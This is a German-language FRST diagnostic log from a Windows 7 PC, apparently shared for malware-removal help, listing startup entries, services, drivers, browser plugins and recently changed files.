(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-27] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2821936 2012-03-07] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {1c281590-2b6f-11e3-b71b-b888e3cf1a37} - E:\LGAutoRun.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6b7e0915-f87b-11e2-9524-806e6f6e6963} - D:\AutoRun\AutoRunX\AutoRunX.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {6dccb73b-6b4e-11e3-accd-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {720267d0-76b1-11e3-8f9d-b888e3cf1a37} - F:\SETUP.EXE
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {81dd1ca2-40b4-11e4-893b-b888e3cf1a37} - E:\Startme.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\MountPoints2: {85a61aa3-6a20-11e3-a24a-b888e3cf1a37} - E:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ACHTUNG
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\avsinit.vbs [2014-12-15] ()
CHR HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\..\Interfaces\{A03D809F-5B31-4946-837B-6FB4B372ABD0}: [DhcpNameServer] 80.69.100.212 80.69.100.205

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKLM-x32 -> Standard = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = 
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> SuggestionsURL_JSON hxxp://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms}
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652
FF Homepage: google.de
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-09] ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-10-12] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-10-12] (Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1203133.dll [2013-06-26] (Adobe Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @ngm.nexoneu.com/NxGame -> C:\ProgramData\NexonEU\NGM\npNxGameEU.dll [2015-08-04] (Nexon)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\Özkan\Documents\my games\PB\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-1539430812-113463742-2149372525-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Özkan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Extension: Adblock Plus Pop-up Addon - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\extensions\adblockpopups@jessehakanen.net.xpi [2015-12-08]
FF Extension: Adblock Plus - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\izil1z1z.default-1431806299652\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-12-15]

Chrome: 
=======
CHR Profile: C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Präsentationen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-08]
CHR Extension: (Google Docs) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-08]
CHR Extension: (Google Drive) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-08]
CHR Extension: (YouTube) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-08]
CHR Extension: (Adblock Plus) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-12-08]
CHR Extension: (Google-Suche) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-08]
CHR Extension: (Google Tabellen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-08]
CHR Extension: (Google Mail) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [448384 2014-08-15] ()
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-08] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 Sony PC Companion; C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe [155824 2013-02-04] (Avanquest Software) [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5491984 2015-05-20] (TeamViewer GmbH)
S3 ACTION_SVC; C:\Program Files (x86)\Mirillis\Action!\action_svc.exe [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Mobizen plugin; C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe [X]
S3 MozillaMaintenance; "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" [X]
S2 Tender Switch; "C:\Program Files (x86)\Tender Switch\Tender Switch.exe" [X]
S3 TrustedInstaller; %SystemRoot%\servicing\TrustedInstaller.exe [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 AVEO; C:\Windows\System32\DRIVERS\AVEOdcnt.sys [305920 2011-10-24] (AVEO)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2014-01-16] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2014-10-22] (Sony Mobile Communications)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
S3 smhwser; C:\Windows\System32\DRIVERS\smhwser.sys [122624 2010-02-04] (QUALCOMM Incorporated)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2014-07-28] (Apple, Inc.) [Datei ist nicht signiert]
S3 USBTINSP; C:\Windows\System32\DRIVERS\tinspusb.sys [142848 2010-03-29] (Texas Instruments)
S1 BdfNdisf; \??\c:\program files\common files\bitdefender\bitdefender firewall\bdfndisf6.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va034; \??\C:\Windows\SysWOW64\Drivers\X6va034 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 xspirit; \??\C:\Windows\xspirit.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-26 22:52 - 2015-12-26 23:06 - 00000000 ____D C:\Users\Özkan\AppData\Local\LogMeIn Hamachi
2015-12-26 22:52 - 2015-12-26 22:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Hamachi
2015-12-26 22:52 - 2015-12-26 22:52 - 00000000 ____D C:\Program Files (x86)\LogMeIn Hamachi
2015-12-23 01:08 - 2015-12-23 01:08 - 00001210 _____ C:\Users\Özkan\Desktop\mbam2.txt
2015-12-22 00:29 - 2015-12-22 00:29 - 00235373 _____ C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00027576 _____ C:\ProgramData\1450740559.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00000505 _____ C:\Users\Özkan\Desktop\mbam.txt
2015-12-21 23:26 - 2015-12-23 22:38 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-21 23:26 - 2015-12-22 00:23 - 00001096 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-12-21 23:26 - 2015-12-21 23:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-12-21 23:25 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-21 23:14 - 2015-12-21 23:18 - 00000000 ____D C:\AdwCleaner
2015-12-21 22:52 - 2015-12-26 23:06 - 00000000 ____D C:\FRST
2015-12-21 12:32 - 2015-12-21 23:12 - 00002651 _____ C:\Users\Özkan\Desktop\Neues Textdokument.txt
2015-12-19 22:03 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2015-12-19 09:34 - 2015-12-19 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fraps
2015-12-18 22:14 - 2015-12-18 22:14 - 00001037 _____ C:\Users\Özkan\Documents\R50234.txt
2015-12-18 19:46 - 2015-12-18 19:46 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2015-12-18 19:36 - 2015-12-26 22:58 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-18 19:36 - 2015-12-26 21:53 - 00000000 ____D C:\Users\Özkan\Desktop\Bewerbungen Etc
2015-12-18 19:36 - 2015-12-18 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-17 20:05 - 2015-12-17 20:05 - 00019336 _____ C:\Windows\System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C}
2015-12-09 20:18 - 2015-12-09 20:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2015-12-08 21:35 - 2015-12-22 00:23 - 00001141 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-08 21:34 - 2015-12-08 21:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Program Files\Common Files\AV
2015-12-08 21:30 - 2015-12-09 15:05 - 00000000 ____D C:\ProgramData\AVAST Software
2015-12-08 21:09 - 2015-12-26 22:47 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-08 21:09 - 2015-12-26 22:20 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-08 21:09 - 2015-12-08 21:15 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-08 21:09 - 2015-12-08 21:15 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{30aa3bf1-20c8-0}
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{029b1f57-60c8-1}
2015-12-04 21:54 - 2015-12-07 15:23 - 00000000 ____D C:\Users\Özkan\Documents\AnotherLife-Keybinder
2015-12-04 17:45 - 2015-12-04 17:47 - 00000000 ____D C:\Program Files\Microsoft Office

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-26 23:00 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-26 23:00 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-26 22:48 - 2013-12-23 19:37 - 00000436 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2015-12-26 22:47 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-26 21:38 - 2013-07-29 20:28 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-12-24 20:32 - 2014-08-18 15:45 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\.minecraft
2015-12-23 20:25 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-22 10:30 - 2015-08-25 07:55 - 00000000 ____D C:\Program Files\Bitdefender
2015-12-22 00:33 - 2014-01-16 14:09 - 00000000 ____D C:\Users\Özkan\AppData\Local\ElevatedDiagnostics
2015-12-22 00:33 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-12-22 00:28 - 2014-01-20 19:03 - 00000000 ____D C:\ProgramData\Bitdefender
2015-12-22 00:28 - 2014-01-20 19:02 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2015-12-22 00:27 - 2014-11-09 22:57 - 00145397 _____ C:\bdlog.txt
2015-12-22 00:27 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-22 00:23 - 2015-10-06 17:25 - 00001147 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-22 00:23 - 2015-10-01 18:36 - 00001209 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2015-12-22 00:23 - 2015-05-23 17:29 - 00001031 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 10.lnk
2015-12-22 00:23 - 2014-07-17 14:36 - 00001293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2015-12-22 00:23 - 2014-07-17 14:35 - 00001362 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2015-12-22 00:23 - 2014-01-19 16:21 - 00000924 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2015-12-22 00:23 - 2013-07-29 20:05 - 00000860 _____ C:\Users\Public\Desktop\CCleaner.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001292 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
2015-12-22 00:23 - 2009-07-14 05:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
2015-12-22 00:22 - 2014-11-09 22:33 - 00002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\GetDataBack for NTFS.lnk
2015-12-22 00:22 - 2014-02-16 20:27 - 00001421 _____ C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-22 00:22 - 2013-11-24 20:17 - 00000355 _____ C:\Users\Özkan\Desktop\Computer.lnk
2015-12-22 00:22 - 2009-07-14 06:01 - 00001218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
2015-12-22 00:22 - 2009-07-14 05:49 - 00001246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2015-12-22 00:14 - 2013-08-11 13:13 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-12-21 23:18 - 2013-07-29 19:30 - 00000000 ____D C:\Users\Özkan
2015-12-21 23:09 - 2014-09-30 16:38 - 01068032 ___SH C:\Users\Özkan\Desktop\Thumbs.db
2015-12-21 13:59 - 2015-06-06 05:04 - 00000000 ____D C:\Users\Özkan\AppData\Local\CrashDumps
2015-12-19 09:34 - 2015-10-05 22:17 - 00000000 ____D C:\Fraps
2015-12-19 08:12 - 2014-03-27 18:54 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2015-12-18 19:46 - 2015-06-15 13:20 - 00000000 ____D C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client
2015-12-18 19:14 - 2014-04-26 15:58 - 00000000 ____D C:\ProgramData\Origin
2015-12-18 19:13 - 2015-08-15 06:58 - 00000000 ____D C:\Program Files (x86)\Warlord II
2015-12-15 13:59 - 2009-07-14 06:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-13 13:02 - 2015-10-08 12:54 - 00000000 ____D C:\Users\Ã–zkan\AppData\Local\Steam
2015-12-10 17:16 - 2014-02-18 15:55 - 00000000 ____D C:\temp
2015-12-10 16:26 - 2015-08-15 06:31 - 00000000 ____D C:\Program Files (x86)\SmoothScroll
2015-12-10 16:23 - 2009-07-14 18:58 - 00704504 _____ C:\Windows\system32\perfh007.dat
2015-12-10 16:23 - 2009-07-14 18:58 - 00152310 _____ C:\Windows\system32\perfc007.dat
2015-12-10 16:23 - 2009-07-14 06:13 - 01634288 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-09 16:38 - 2013-07-29 20:28 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 16:38 - 2013-07-29 20:28 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 16:38 - 2013-07-29 20:28 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-12-09 13:53 - 2015-08-25 18:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mirillis
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-08 21:25 - 2015-10-03 08:31 - 00000000 ____D C:\Program Files (x86)\AnotherLifeClient
2015-12-08 20:57 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-12-11 15:57 - 2013-12-11 15:57 - 2791563 _____ () C:\Program Files\oodr.chm
2013-12-11 18:58 - 2013-12-11 18:58 - 1755432 _____ (O&O Software GmbH) C:\Program Files\oodrrs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 3407656 _____ (O&O Software GmbH) C:\Program Files\oodrsurs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 6164264 _____ (O&O Software GmbH) C:\Program Files\oodskrec.exe
2013-10-09 14:22 - 2013-10-09 14:22 - 1016624 _____ (O&O Software GmbH) C:\Program Files\ooliveupdate.exe
2013-12-10 15:46 - 2013-12-10 15:46 - 6562600 _____ (O&O Software GmbH) C:\Program Files\oorwiz3.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 0164136 _____ (O&O Software GmbH) C:\Program Files\oorwiz3r.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 4554536 _____ (O&O Software GmbH) C:\Program Files\oosu.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 4900648 _____ (O&O Software GmbH) C:\Program Files\ooviewer.dll
2013-12-11 16:06 - 2013-12-11 16:06 - 0001755 _____ () C:\Program Files\readme.txt
2015-11-07 17:58 - 2015-11-07 18:02 - 6420480 _____ () C:\Program Files (x86)\GUT87EA.tmp
2015-06-24 19:34 - 2015-06-26 22:40 - 0000079 _____ () C:\Program Files (x86)\prefs.js
2015-07-22 12:45 - 2015-08-14 14:53 - 0000020 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr2.bin
2015-08-15 06:29 - 2015-08-25 07:48 - 0000024 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr25.bin
2014-07-08 18:34 - 2014-07-08 18:34 - 0000000 ___SH () C:\Users\Özkan\AppData\Local\LumaEmu
2015-06-27 12:06 - 2015-06-27 12:06 - 0000000 _____ () C:\Users\Özkan\AppData\Local\Temp.dat
2015-12-22 00:29 - 2015-12-22 00:29 - 0235373 _____ () C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 0027576 _____ () C:\ProgramData\1450740559.bdinstall.bin
2015-08-14 20:57 - 2015-08-14 20:57 - 0000006 __RSH () C:\ProgramData\37d3abf93dbe04b7eb83987cae627f61c2b48eeb

Einige Dateien in TEMP:
====================
C:\Users\Özkan\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

